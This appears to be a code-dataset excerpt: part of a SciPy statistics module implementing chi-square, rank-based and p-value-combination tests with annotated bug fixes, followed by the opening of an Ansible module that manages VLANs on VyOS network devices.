            f_exp = np.atleast_1d(f_obs.mean(axis=axis))
        if axis is not None:
            reduced_shape = list(f_obs.shape)
            reduced_shape[axis] = 1
            f_exp.shape = reduced_shape
    else:
        f_exp = np.atleast_1d(np.asanyarray(f_exp))

    # Per-category contributions summed along `axis` to form the statistic,
    # with specialized code for the common powers.
    if lambda_ == 1:
        # Pearson's chi-squared statistic
        terms = (f_obs - f_exp)**2 / f_exp
    elif lambda_ == 0:
        # Log-likelihood ratio (i.e. G-test)
        terms = 2.0 * special.xlogy(f_obs, f_obs / f_exp)
    elif lambda_ == -1:
        # Modified log-likelihood ratio
        terms = 2.0 * special.xlogy(f_exp, f_exp / f_obs)
    else:
        # General Cressie-Read power divergence.
        terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
        terms /= 0.5 * lambda_ * (lambda_ + 1)

    stat = terms.sum(axis=axis)

    # Masked entries are excluded from the category count.
    num_obs = _count(terms, axis=axis)
    p = distributions.chi2.sf(stat, num_obs - 1 - np.asarray(ddof))

    Power_divergenceResult = namedtuple('Power_divergenceResult', ('statistic',
                                                                   'pvalue'))
    return Power_divergenceResult(stat, p)
def chisquare(f_obs, f_exp=None, ddof=0, axis=0):
    """
    Calculates a one-way chi square test.

    The chi square test tests the null hypothesis that the categorical data
    has the given frequencies.

    Parameters
    ----------
    f_obs : array_like
        Observed frequencies in each category.
    f_exp : array_like, optional
        Expected frequencies in each category.  By default the categories
        are assumed to be equally likely.
    ddof : int, optional
        "Delta degrees of freedom": adjustment to the degrees of freedom
        for the p-value.  The p-value is computed using a chi-squared
        distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
        is the number of observed frequencies.  The default value of
        `ddof` is 0.
    axis : int or None, optional
        The axis of the broadcast result of `f_obs` and `f_exp` along
        which to apply the test.  If axis is None, all values in `f_obs`
        are treated as a single data set.  Default is 0.

    Returns
    -------
    chisq : float or ndarray
        The chi-squared test statistic.  The value is a float if `axis` is
        None or `f_obs` and `f_exp` are 1-D.
    p : float or ndarray
        The p-value of the test.  The value is a float if `ddof` and the
        return value `chisq` are scalars.

    See Also
    --------
    power_divergence
    mstats.chisquare

    Notes
    -----
    This test is invalid when the observed or expected frequencies in each
    category are too small.  A typical rule is that all of the observed
    and expected frequencies should be at least 5.

    The default degrees of freedom, k-1, are for the case when no parameters
    of the distribution are estimated.  If p parameters are estimated by
    efficient maximum likelihood then the correct degrees of freedom are
    k-1-p.  If the parameters are estimated in a different way, then the
    dof can be between k-1-p and k-1.  However, it is also possible that
    the asymptotic distribution is not a chisquare, in which case this
    test is not appropriate.

    References
    ----------
    .. [1] Lowry, Richard. "Concepts and Applications of Inferential
           Statistics". Chapter 8. http://faculty.vassar.edu/lowry/ch8pt1.html
    .. [2] "Chi-squared test", http://en.wikipedia.org/wiki/Chi-squared_test

    Examples
    --------
    When just `f_obs` is given, it is assumed that the expected frequencies
    are uniform and given by the mean of the observed frequencies.

    >>> from scipy.stats import chisquare
    >>> chisquare([16, 18, 16, 14, 12, 12])
    (2.0, 0.84914503608460956)

    With `f_exp` the expected frequencies can be given.

    >>> chisquare([16, 18, 16, 14, 12, 12], f_exp=[16, 16, 16, 16, 16, 8])
    (3.5, 0.62338762774958223)

    `ddof` is the change to make to the default degrees of freedom.

    >>> chisquare([16, 18, 16, 14, 12, 12], ddof=1)
    (2.0, 0.73575888234288467)

    (See `power_divergence` for more examples, including 2-D input and
    broadcasting of `f_obs`, `f_exp` and `ddof`.)

    """
    # Pearson's chi-squared statistic is the lambda_ = 1 ("pearson") member
    # of the Cressie-Read power divergence family.
    return power_divergence(f_obs, f_exp=f_exp, ddof=ddof, axis=axis,
                            lambda_="pearson")
def ks_2samp(data1, data2):
    """
    Computes the Kolmogorov-Smirnov statistic on 2 samples.

    This is a two-sided test for the null hypothesis that 2 independent
    samples are drawn from the same continuous distribution.

    Parameters
    ----------
    data1, data2 : sequence of 1-D ndarrays
        Two arrays of sample observations assumed to be drawn from a
        continuous distribution; sample sizes can be different.

    Returns
    -------
    statistic : float
        KS statistic (maximum absolute difference between the two
        empirical CDFs).
    pvalue : float
        Two-tailed p-value from the asymptotic two-sided
        Kolmogorov-Smirnov distribution.

    Notes
    -----
    This tests whether 2 samples are drawn from the same distribution.
    Note that, like in the case of the one-sample K-S test, the
    distribution is assumed to be continuous.  One-sided tests are not
    implemented.  If the K-S statistic is small or the p-value is high,
    then we cannot reject the hypothesis that the distributions of the
    two samples are the same.
    """
    data1 = np.sort(data1)
    data2 = np.sort(data2)
    n1 = data1.shape[0]
    n2 = data2.shape[0]
    data_all = np.concatenate([data1, data2])
    # Empirical CDFs of each sample evaluated at every observed point.
    cdf1 = np.searchsorted(data1, data_all, side='right') / (1.0*n1)
    cdf2 = np.searchsorted(data2, data_all, side='right') / (1.0*n2)
    d = np.max(np.absolute(cdf1 - cdf2))
    # Note: d absolute not signed distance
    en = np.sqrt(n1 * n2 / float(n1 + n2))
    try:
        prob = distributions.kstwobign.sf((en + 0.12 + 0.11 / en) * d)
    except Exception:
        # BUG FIX: was a bare `except:` that also swallowed
        # KeyboardInterrupt/SystemExit.  On numerical failure fall back
        # to the conservative p-value of 1.0.
        prob = 1.0
    Ks_2sampResult = namedtuple('Ks_2sampResult', ('statistic', 'pvalue'))
    return Ks_2sampResult(d, prob)
def mannwhitneyu(x, y, use_continuity=True, alternative='two-sided'):
    """
    Computes the Mann-Whitney rank test on samples x and y.

    Parameters
    ----------
    x, y : array_like
        Array of samples, should be one-dimensional.
    use_continuity : bool, optional
        Whether a continuity correction (1/2.) should be taken into
        account. Default is True.
    alternative : {'less', 'greater', 'two-sided'}, optional
        Defines the alternative hypothesis.  Default is 'two-sided'.

    Returns
    -------
    statistic : float
        The Mann-Whitney U statistic.
    pvalue : float
        p-value assuming an asymptotic normal distribution; one-sided
        for 'less'/'greater', two-sided for 'two-sided'.

    Notes
    -----
    Use only when the number of observation in each sample is > 20 and
    you have 2 independent samples of ranks. Mann-Whitney U is
    significant if the u-obtained is LESS THAN or equal to the critical
    value of U.  This test corrects for ties and by default uses a
    continuity correction.
    """
    x = np.asarray(x)
    y = np.asarray(y)
    n1 = len(x)
    n2 = len(y)
    ranked = rankdata(np.concatenate((x, y)))
    rankx = ranked[0:n1]  # get the x-ranks
    u1 = n1*n2 + (n1*(n1+1))/2.0 - np.sum(rankx, axis=0)  # calc U for x
    u2 = n1*n2 - u1  # remainder is U for y
    T = tiecorrect(ranked)
    if T == 0:
        # BUG FIX: message previously read 'amannwhitneyu' (typo).
        raise ValueError('All numbers are identical in mannwhitneyu')
    sd = np.sqrt(T * n1 * n2 * (n1+n2+1) / 12.0)
    fact2 = 1
    # Mean of U under H0, plus the optional 1/2 continuity correction.
    meanrank = n1*n2/2.0 + 0.5 * use_continuity
    if alternative == 'less':
        z = u1 - meanrank
    elif alternative == 'greater':
        z = u2 - meanrank
    elif alternative == 'two-sided':
        bigu = max(u1, u2)
        z = np.abs(bigu - meanrank)
        fact2 = 2.
    else:
        # BUG FIX: restored the missing space between 'greater' and 'or'.
        raise ValueError("alternative should be 'less', 'greater' "
                         "or 'two-sided'")
    z = z / sd
    # NOTE(review): the statistic returned is always u2 regardless of
    # `alternative` -- historical behavior preserved; confirm before changing.
    MannwhitneyuResult = namedtuple('MannwhitneyuResult', ('statistic',
                                                           'pvalue'))
    return MannwhitneyuResult(u2, distributions.norm.sf(z) * fact2)
def ranksums(x, y):
    """
    Compute the Wilcoxon rank-sum statistic for two samples.

    Tests the null hypothesis that the two sets of measurements come
    from the same distribution, against the alternative that values in
    one sample tend to be larger than in the other.  Ties are not
    handled; see `scipy.stats.mannwhitneyu` for tie correction and an
    optional continuity correction.

    Parameters
    ----------
    x,y : array_like
        The data from the two samples

    Returns
    -------
    statistic : float
        Normal-approximation z statistic of the rank sum of `x`.
    pvalue : float
        The two-sided p-value of the test

    References
    ----------
    .. [1] http://en.wikipedia.org/wiki/Wilcoxon_rank-sum_test
    """
    x, y = map(np.asarray, (x, y))
    nx, ny = len(x), len(y)
    # Rank the pooled observations; the first nx ranks belong to x.
    pooled_ranks = rankdata(np.concatenate((x, y)))
    rank_sum_x = np.sum(pooled_ranks[:nx], axis=0)
    expected_sum = nx * (nx + ny + 1) / 2.0
    std_dev = np.sqrt(nx * ny * (nx + ny + 1) / 12.0)
    z_stat = (rank_sum_x - expected_sum) / std_dev
    two_sided_p = 2 * distributions.norm.sf(abs(z_stat))
    RanksumsResult = namedtuple('RanksumsResult', ('statistic', 'pvalue'))
    return RanksumsResult(z_stat, two_sided_p)
def kruskal(*args, **kwargs):
    """
    Compute the Kruskal-Wallis H-test for independent samples

    The Kruskal-Wallis H-test tests the null hypothesis that the population
    median of all of the groups are equal.  It is a non-parametric version of
    ANOVA.  The test works on 2 or more independent samples, which may have
    different sizes.  Note that rejecting the null hypothesis does not
    indicate which of the groups differs.  Post-hoc comparisons between
    groups are required to determine which groups are different.

    Parameters
    ----------
    sample1, sample2, ... : array_like
        Two or more arrays with the sample measurements can be given as
        arguments.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' performs the calculations
        ignoring nan values. Default is 'propagate'.

    Returns
    -------
    statistic : float
        The Kruskal-Wallis H statistic, corrected for ties
    pvalue : float
        The p-value for the test using the assumption that H has a chi
        square distribution

    Notes
    -----
    Due to the assumption that H has a chi square distribution, the number
    of samples in each group must not be too small.  A typical rule is
    that each sample must have at least 5 measurements.

    References
    ----------
    .. [1] W. H. Kruskal & W. W. Wallis, "Use of Ranks in
       One-Criterion Variance Analysis", Journal of the American Statistical
       Association, Vol. 47, Issue 260, pp. 583-621, 1952.
    .. [2] http://en.wikipedia.org/wiki/Kruskal-Wallis_one-way_analysis_of_variance
    """
    args = list(map(np.asarray, args))
    num_groups = len(args)
    if num_groups < 2:
        raise ValueError("Need at least two groups in stats.kruskal()")

    # BUG FIX: the result namedtuple was defined twice; define it once.
    KruskalResult = namedtuple('KruskalResult', ('statistic', 'pvalue'))

    for arg in args:
        if arg.size == 0:
            return KruskalResult(np.nan, np.nan)
    n = np.asarray(list(map(len, args)))

    nan_policy = kwargs.get('nan_policy', 'propagate')
    if nan_policy not in ('propagate', 'raise', 'omit'):
        # BUG FIX: restored the missing space in "or 'omit'".
        raise ValueError("nan_policy must be 'propagate', "
                         "'raise' or 'omit'")

    contains_nan = False
    for arg in args:
        cn = _contains_nan(arg, nan_policy)
        if cn[0]:
            contains_nan = True
            break

    if contains_nan and nan_policy == 'omit':
        # BUG FIX: the original rebound the loop variable
        # (`for a in args: a = ma.masked_invalid(a)`), which never
        # modified `args`, so nans were not actually omitted.  Mask each
        # group before delegating to the masked-array implementation.
        args = [ma.masked_invalid(a) for a in args]
        return mstats_basic.kruskal(*args)

    if contains_nan and nan_policy == 'propagate':
        return KruskalResult(np.nan, np.nan)

    alldata = np.concatenate(args)
    ranked = rankdata(alldata)
    ties = tiecorrect(ranked)
    if ties == 0:
        raise ValueError('All numbers are identical in kruskal')

    # Compute sum^2/n for each group and sum.  `j` holds the slice
    # boundaries of each group inside the pooled rank array.
    j = np.insert(np.cumsum(n), 0, 0)
    ssbn = 0
    for i in range(num_groups):
        ssbn += _square_of_sums(ranked[j[i]:j[i+1]]) / float(n[i])

    totaln = np.sum(n)
    h = 12.0 / (totaln * (totaln + 1)) * ssbn - 3 * (totaln + 1)
    df = num_groups - 1
    h /= ties  # tie correction
    return KruskalResult(h, distributions.chi2.sf(h, df))
def friedmanchisquare(*args):
    """
    Computes the Friedman test for repeated measurements

    Tests the null hypothesis that repeated measurements of the same
    individuals have the same distribution, e.g. to check that two or
    more measurement techniques applied to the same individuals are
    consistent.

    Parameters
    ----------
    measurements1, measurements2, measurements3... : array_like
        Arrays of measurements.  All of the arrays must have the same
        number of elements.  At least 3 sets of measurements must be given.

    Returns
    -------
    statistic : float
        the test statistic, correcting for ties
    pvalue : float
        the associated p-value assuming that the test statistic has a chi
        squared distribution

    Notes
    -----
    Due to the assumption that the test statistic has a chi squared
    distribution, the p-value is only reliable for n > 10 and more than
    6 repeated measurements.

    References
    ----------
    .. [1] http://en.wikipedia.org/wiki/Friedman_test
    """
    k = len(args)
    if k < 3:
        raise ValueError('\nLess than 3 levels. Friedman test not appropriate.\n')
    n = len(args[0])
    if any(len(sample) != n for sample in args[1:]):
        raise ValueError('Unequal N in friedmanchisquare. Aborting.')

    # One row per individual; rank each individual's k measurements.
    data = np.vstack(args).T
    data = data.astype(float)
    for row_idx in range(len(data)):
        data[row_idx] = rankdata(data[row_idx])

    # Tie correction factor across all rows.
    tie_sum = 0
    for row_idx in range(len(data)):
        _, repeat_counts = find_repeats(array(data[row_idx]))
        for count in repeat_counts:
            tie_sum += count * (count*count - 1)
    correction = 1 - tie_sum / float(k*(k*k - 1)*n)

    ssbn = np.sum(data.sum(axis=0)**2)
    statistic = (12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)) / correction
    FriedmanchisquareResult = namedtuple('FriedmanchisquareResult',
                                         ('statistic', 'pvalue'))
    return FriedmanchisquareResult(statistic,
                                   distributions.chi2.sf(statistic, k - 1))
def combine_pvalues(pvalues, method='fisher', weights=None):
    """
    Methods for combining the p-values of independent tests bearing upon the
    same hypothesis.

    Parameters
    ----------
    pvalues : array_like, 1-D
        Array of p-values assumed to come from independent tests.
    method : {'fisher', 'stouffer'}, optional
        Name of method to use to combine p-values. The following methods are
        available:

        - "fisher": Fisher's method (Fisher's combined probability test),
          the default.
        - "stouffer": Stouffer's Z-score method.
    weights : array_like, 1-D, optional
        Optional array of weights used only for Stouffer's Z-score method.

    Returns
    -------
    statistic: float
        The statistic calculated by the specified method:

        - "fisher": The chi-squared statistic
        - "stouffer": The Z-score
    pval: float
        The combined p-value.

    Raises
    ------
    ValueError
        If `pvalues` is not 1-D, `weights` is not 1-D or does not match
        `pvalues` in length, or `method` is unknown.

    Notes
    -----
    Fisher's method (also known as Fisher's combined probability test) [1]_
    uses a chi-squared statistic to compute a combined p-value. The closely
    related Stouffer's Z-score method [2]_ uses Z-scores rather than
    p-values. The advantage of Stouffer's method is that it is
    straightforward to introduce weights, which can make Stouffer's method
    more powerful than Fisher's method when the p-values are from studies
    of different size [3]_ [4]_.

    .. versionadded:: 0.15.0

    References
    ----------
    .. [1] https://en.wikipedia.org/wiki/Fisher%27s_method
    .. [2] http://en.wikipedia.org/wiki/Fisher's_method#Relation_to_Stouffer.27s_Z-score_method
    .. [3] Whitlock, M. C. "Combining probability from independent tests: the
           weighted Z-method is superior to Fisher's approach." Journal of
           Evolutionary Biology 18, no. 5 (2005): 1368-1373.
    .. [4] Zaykin, Dmitri V. "Optimally weighted Z-test is a powerful method
           for combining probabilities in meta-analysis." Journal of
           Evolutionary Biology 24, no. 8 (2011): 1836-1841.
    .. [5] https://en.wikipedia.org/wiki/Extensions_of_Fisher%27s_method
    """
    pvalues = np.asarray(pvalues)
    if pvalues.ndim != 1:
        raise ValueError("pvalues is not 1-D")

    if method == 'fisher':
        # -2 * sum(log(p)) is chi-squared with 2k degrees of freedom.
        Xsq = -2 * np.sum(np.log(pvalues))
        pval = distributions.chi2.sf(Xsq, 2 * len(pvalues))
        return (Xsq, pval)
    elif method == 'stouffer':
        if weights is None:
            weights = np.ones_like(pvalues)
        elif len(weights) != len(pvalues):
            raise ValueError("pvalues and weights must be of the same size.")

        weights = np.asarray(weights)
        if weights.ndim != 1:
            raise ValueError("weights is not 1-D")

        # Weighted sum of Z-scores, normalized by the weight vector norm.
        Zi = distributions.norm.isf(pvalues)
        Z = np.dot(weights, Zi) / np.linalg.norm(weights)
        pval = distributions.norm.sf(Z)
        return (Z, pval)
    else:
        # BUG FIX: the message was passed with a comma instead of the %
        # operator, so ValueError received two arguments and the '%s'
        # placeholder was never substituted.
        raise ValueError(
            "Invalid method '%s'. Options are 'fisher' or 'stouffer'" % method)
#####################################
# PROBABILITY CALCULATIONS #
#####################################
# Deprecated public alias; kept byte-for-byte for backward compatibility.
# New code should call stats.distributions.chi2.sf directly.
@np.deprecate(message="stats.chisqprob is deprecated in scipy 0.17.0; "
              "use stats.distributions.chi2.sf instead.")
def chisqprob(chisq, df):
    """
    Probability value (1-tail) for the Chi^2 probability distribution.

    Broadcasting rules apply.

    Parameters
    ----------
    chisq : array_like or float > 0
        Chi-squared statistic value(s).
    df : array_like or float, probably int >= 1
        Degrees of freedom.

    Returns
    -------
    chisqprob : ndarray
        The area from `chisq` to infinity under the Chi^2 probability
        distribution with degrees of freedom `df`.
    """
    # Survival function == 1 - CDF of the chi-squared distribution.
    return distributions.chi2.sf(chisq, df)
# Deprecated public alias; kept byte-for-byte for backward compatibility.
# New code should call scipy.special.betainc directly.
@np.deprecate(message="stats.betai is deprecated in scipy 0.17.0; "
              "use special.betainc instead")
def betai(a, b, x):
    """
    Returns the incomplete beta function.

    I_x(a,b) = 1/B(a,b)*(Integral(0,x) of t^(a-1)(1-t)^(b-1) dt)

    where a,b>0 and B(a,b) = G(a)*G(b)/(G(a+b)) where G(a) is the gamma
    function of a.

    The standard broadcasting rules apply to a, b, and x.

    Parameters
    ----------
    a : array_like or float > 0
    b : array_like or float > 0
    x : array_like or float
        x will be clipped to be no greater than 1.0 .

    Returns
    -------
    betai : ndarray
        Incomplete beta function.
    """
    # Delegates to the private helper, which performs the clipping.
    return _betai(a, b, x)
def _betai(a, b, x):
x = np.asarray(x)
x = np.where(x < 1.0, x, 1.0) # if x > 1 then return 1.0
return special.betainc(a, b, x)
#####################################
# ANOVA CALCULATIONS #
#####################################
# Deprecated helper; code kept byte-for-byte pending removal.
@np.deprecate(message="stats.f_value_wilks_lambda deprecated in scipy 0.17.0")
def f_value_wilks_lambda(ER, EF, dfnum, dfden, a, b):
    """Calculation of Wilks lambda F-statistic for multivariate data, per
    Maxwell & Delaney p.657.

    ER, EF may be scalars or matrices; `a` and `b` are the factor level
    counts used in Rao's approximation.  Note that `dfnum` and `dfden`
    are accepted but never read -- presumably kept for signature
    compatibility (TODO confirm before removing).
    """
    # Promote scalar inputs to 1x1 matrices so linalg.det applies.
    if isinstance(ER, (int, float)):
        ER = array([[ER]])
    if isinstance(EF, (int, float)):
        EF = array([[EF]])
    lmbda = linalg.det(EF) / linalg.det(ER)
    # When (a-1)^2 + (b-1)^2 == 5 the general formula's denominator is
    # zero, so q falls back to 1.
    if (a-1)**2 + (b-1)**2 == 5:
        q = 1
    else:
        q = np.sqrt(((a-1)**2*(b-1)**2 - 2) / ((a-1)**2 + (b-1)**2 - 5))
    n_um = (1 - lmbda**(1.0/q))*(a-1)*(b-1)
    d_en = lmbda**(1.0/q) / (n_um*q - 0.5*(a-1)*(b-1) + 1)
    return n_um / d_en
# Deprecated helper; code kept byte-for-byte pending removal.
@np.deprecate(message="stats.f_value deprecated in scipy 0.17.0")
def f_value(ER, EF, dfR, dfF):
    """
    Returns an F-statistic for a restricted vs. unrestricted model.

    Parameters
    ----------
    ER : float
         `ER` is the sum of squared residuals for the restricted model
          or null hypothesis
    EF : float
         `EF` is the sum of squared residuals for the unrestricted model
          or alternate hypothesis
    dfR : int
          `dfR` is the degrees of freedom in the restricted model
    dfF : int
          `dfF` is the degrees of freedom in the unrestricted model

    Returns
    -------
    F-statistic : float
    """
    # Standard nested-model F test:
    # ((ER - EF) / (dfR - dfF)) / (EF / dfF)
    return (ER - EF) / float(dfR - dfF) / (EF / float(dfF))
# Deprecated helper; code kept byte-for-byte pending removal.
@np.deprecate(message="stats.f_value_multivariate deprecated in scipy 0.17.0")
def f_value_multivariate(ER, EF, dfnum, dfden):
    """
    Returns a multivariate F-statistic.

    Parameters
    ----------
    ER : ndarray
        Error associated with the null hypothesis (the Restricted model).
        From a multivariate F calculation.
    EF : ndarray
        Error associated with the alternate hypothesis (the Full model)
        From a multivariate F calculation.
    dfnum : int
        Degrees of freedom the Restricted model.
    dfden : int
        Degrees of freedom associated with the Restricted model.
        NOTE(review): per the numerator/denominator roles below this
        presumably should read "Full model" -- confirm against the
        original reference before changing the description.

    Returns
    -------
    fstat : float
        The computed F-statistic.
    """
    # Promote scalar inputs to 1x1 matrices so linalg.det applies.
    if isinstance(ER, (int, float)):
        ER = array([[ER]])
    if isinstance(EF, (int, float)):
        EF = array([[EF]])
    n_um = (linalg.det(ER) - linalg.det(EF)) / float(dfnum)
    d_en = linalg.det(EF) / float(dfden)
    return n_um / d_en
#####################################
# SUPPORT FUNCTIONS #
#####################################
# Deprecated public wrapper around the private _sum_of_squares helper.
@np.deprecate(message="scipy.stats.ss is deprecated in scipy 0.17.0")
def ss(a, axis=0):
    """Return the sum of squares of `a` along `axis`; see `_sum_of_squares`."""
    return _sum_of_squares(a, axis)
def _sum_of_squares(a, axis=0):
    """
    Squares each element of the input array, and returns the sum(s) of that.

    Parameters
    ----------
    a : array_like
        Input array.
    axis : int or None, optional
        Axis along which to calculate. Default is 0. If None, compute over
        the whole array `a`.

    Returns
    -------
    sum_of_squares : ndarray
        The sum along the given axis for (a**2).

    See also
    --------
    _square_of_sums : The square(s) of the sum(s) (the opposite of
        `_sum_of_squares`).
    """
    # _chk_asarray normalizes `a` to an ndarray and resolves axis=None.
    a, axis = _chk_asarray(a, axis)
    squared = a * a
    return np.sum(squared, axis)
# Deprecated public wrapper around the private _square_of_sums helper.
@np.deprecate(message="scipy.stats.square_of_sums is deprecated "
              "in scipy 0.17.0")
def square_of_sums(a, axis=0):
    """Return the square of the sum of `a` along `axis`; see `_square_of_sums`."""
    return _square_of_sums(a, axis)
def _square_of_sums(a, axis=0):
    """
    Sums elements of the input array, and returns the square(s) of that sum.

    Parameters
    ----------
    a : array_like
        Input array.
    axis : int or None, optional
        Axis along which to calculate. Default is 0. If None, compute over
        the whole array `a`.

    Returns
    -------
    square_of_sums : float or ndarray
        The square of the sum over `axis`.

    See also
    --------
    _sum_of_squares : The sum of squares (the opposite of `square_of_sums`).
    """
    # _chk_asarray normalizes `a` to an ndarray and resolves axis=None.
    a, axis = _chk_asarray(a, axis)
    total = np.sum(a, axis)
    if np.isscalar(total):
        return float(total) * total
    # ndarray result: promote to float before squaring to avoid
    # integer overflow semantics.
    return total.astype(float) * total
# Deprecated helper; code kept byte-for-byte pending removal.
@np.deprecate(message="scipy.stats.fastsort is deprecated in scipy 0.16.0")
def fastsort(a):
    """
    Sort an array and provide the argsort.

    Parameters
    ----------
    a : array_like
        Input array.

    Returns
    -------
    sorted : ndarray
        A sorted copy of `a`.
    indices : ndarray of type int
        The indices that would sort the original array
        (i.e. ``np.argsort(a)``).
    """
    # Argsort once, then use the index array to materialize the sorted copy.
    it = np.argsort(a)
    as_ = a[it]
    return as_, it
| bsd-3-clause |
orgito/ansible | lib/ansible/modules/network/vyos/vyos_vlan.py | 13 | 9326 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: vyos_vlan
version_added: "2.5"
author: "Trishna Guha (@trishnaguha)"
short_description: Manage VLANs on VyOS network devices
description:
- This module provides declarative management of VLANs
on VyOS network devices.
notes:
- Tested against VYOS 1.1.7
options:
name:
description:
- Name of the VLAN.
address:
description:
- Configure Virtual interface address.
vlan_id:
description:
- ID of the VLAN. Range 0-4094.
required: true
interfaces:
description:
- List of interfaces that should be associated to the VLAN.
required: true
associated_interfaces:
description:
- This is a intent option and checks the operational state of the for given vlan C(name)
for associated interfaces. If the value in the C(associated_interfaces) does not match with
the operational state of vlan on device it will result in failure.
version_added: "2.5"
delay:
description:
- Delay the play should wait to check for declarative intent params values.
default: 10
aggregate:
description: List of VLANs definitions.
purge:
description:
- Purge VLANs not defined in the I(aggregate) parameter.
default: no
type: bool
state:
description:
- State of the VLAN configuration.
default: present
choices: ['present', 'absent']
extends_documentation_fragment: vyos
"""
EXAMPLES = """
- name: Create vlan
vyos_vlan:
vlan_id: 100
name: vlan-100
interfaces: eth1
state: present
- name: Add interfaces to VLAN
vyos_vlan:
vlan_id: 100
interfaces:
- eth1
- eth2
- name: Configure virtual interface address
vyos_vlan:
vlan_id: 100
interfaces: eth1
address: 172.26.100.37/24
- name: vlan interface config + intent
vyos_vlan:
vlan_id: 100
interfaces: eth0
associated_interfaces:
- eth0
- name: vlan intent check
vyos_vlan:
vlan_id: 100
associated_interfaces:
- eth3
- eth4
- name: Delete vlan
vyos_vlan:
vlan_id: 100
interfaces: eth1
state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set interfaces ethernet eth1 vif 100 description VLAN 100
- set interfaces ethernet eth1 vif 100 address 172.26.100.37/24
- delete interfaces ethernet eth1 vif 100
"""
import re
import time
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
from ansible.module_utils.network.vyos.vyos import load_config, run_commands
from ansible.module_utils.network.vyos.vyos import vyos_argument_spec
def search_obj_in_list(vlan_id, lst):
    """Return every entry of *lst* whose 'vlan_id' value equals *vlan_id*."""
    return [entry for entry in lst if entry['vlan_id'] == vlan_id]


def map_obj_to_commands(updates, module):
    """Build the VyOS command list that reconciles desired vs. current vlans.

    `updates` is a ``(want, have)`` pair of vlan dicts; `module` supplies
    the ``purge`` parameter.  Returns a list of ``set``/``delete``
    configuration command strings.
    """
    commands = []
    want, have = updates
    purge = module.params['purge']

    for desired in want:
        vlan_id = desired['vlan_id']
        existing = search_obj_in_list(vlan_id, have)

        if desired['state'] == 'absent':
            # Remove the vif from every interface it currently exists on.
            for match in existing:
                for intf in match['interfaces']:
                    commands.append(
                        'delete interfaces ethernet {0} vif {1}'.format(intf, vlan_id))
        elif desired['state'] == 'present' and not existing:
            if desired['interfaces'] and desired['vlan_id']:
                for intf in desired['interfaces']:
                    base = 'set interfaces ethernet {0} vif {1}'.format(intf, vlan_id)
                    # NOTE(review): when both name and address are supplied,
                    # only the description command is emitted (historical
                    # behavior preserved) -- confirm before relying on
                    # address in that case.
                    if desired['name']:
                        commands.append(base + ' description {}'.format(desired['name']))
                    elif desired['address']:
                        commands.append(base + ' address {}'.format(desired['address']))
                    else:
                        commands.append(base)

    if purge:
        # Delete any configured vlan not present in the desired state.
        for current in have:
            if not search_obj_in_list(current['vlan_id'], want):
                for intf in current['interfaces']:
                    commands.append(
                        'delete interfaces ethernet {0} vif {1}'.format(
                            intf, current['vlan_id']))

    return commands
def map_params_to_obj(module):
    """Normalize module parameters into a list of vlan description dicts.

    With ``aggregate``, each aggregate item is backfilled from the
    top-level parameters and must carry a vlan_id; otherwise a single
    dict is built from the top-level parameters.  ``vlan_id`` is always
    converted to a string.
    """
    params = module.params
    aggregate = params.get('aggregate')

    if not aggregate:
        return [{
            'vlan_id': str(params['vlan_id']),
            'name': params['name'],
            'address': params['address'],
            'state': params['state'],
            'interfaces': params['interfaces'],
            'associated_interfaces': params['associated_interfaces']
        }]

    objs = []
    for item in aggregate:
        # Backfill unset per-item options from the top-level parameters.
        for key in item:
            if item.get(key) is None:
                item[key] = params[key]
        entry = item.copy()
        if not entry['vlan_id']:
            module.fail_json(msg='vlan_id is required')
        entry['vlan_id'] = str(entry['vlan_id'])
        module._check_required_one_of(module.required_one_of, item)
        objs.append(entry)
    return objs
def map_config_to_obj(module):
    """Parse `show interfaces` output into a list of vlan fact dicts.

    Each returned dict carries 'interfaces', 'vlan_id' (None for plain
    ethernet interfaces), 'state', and optionally 'address' and 'name'.
    """
    objs = []
    output = run_commands(module, 'show interfaces')
    # Skip the three table-header lines of the command output.
    for raw_line in output[0].strip().splitlines()[3:]:
        columns = re.split(r'\s{2,}', raw_line.strip())
        iface = columns[0].strip("'")
        if not iface.startswith('eth'):
            continue
        entry = {'interfaces': [], 'state': 'present'}
        parts = iface.split('.')
        if len(parts) > 1:
            # 'eth0.100' style: base interface plus vif (vlan) id.
            entry['interfaces'].append(parts[0])
            entry['vlan_id'] = parts[-1]
        else:
            entry['interfaces'].append(iface)
            entry['vlan_id'] = None
        address = columns[1].strip("'")
        if address != '-':
            entry['address'] = address
        if len(columns) > 3:
            entry['name'] = columns[3].strip("'")
        objs.append(entry)
    return objs
def check_declarative_intent_params(want, module, result):
    """Verify the `associated_interfaces` intent against device state.

    For every desired vlan that declares `associated_interfaces`, read the
    operational state back (after an optional settle delay when a change
    was just applied) and fail the module if any declared interface is not
    actually configured on that vlan.  Returns None.
    """
    have = None
    obj_interface = list()
    is_delay = False

    for w in want:
        if w.get('associated_interfaces') is None:
            continue
        # Give the device time to converge before reading state back --
        # once, and only if this run actually changed something.
        if result['changed'] and not is_delay:
            time.sleep(module.params['delay'])
            is_delay = True
        if have is None:
            have = map_config_to_obj(module)
        obj_in_have = search_obj_in_list(w['vlan_id'], have)
        if obj_in_have:
            for obj in obj_in_have:
                obj_interface.extend(obj['interfaces'])

    for w in want:
        if w.get('associated_interfaces') is None:
            continue
        for i in w['associated_interfaces']:
            # BUG FIX: the original condition tested
            # `set(obj_interface) - set(w['associated_interfaces'])`,
            # which ignored the loop variable `i` entirely and checked
            # the wrong direction -- intent interfaces missing from the
            # device never triggered a failure.  Check membership of
            # each declared interface, matching the error message.
            if i not in obj_interface:
                module.fail_json(msg='Interface {0} not configured on vlan {1}'.format(i, w['vlan_id']))
def main():
    """ main entry point for module execution
    """
    # Per-vlan options; these are also valid at the top level when
    # `aggregate` is not used.
    element_spec = dict(
        vlan_id=dict(type='int'),
        name=dict(),
        address=dict(),
        interfaces=dict(type='list'),
        associated_interfaces=dict(type='list'),
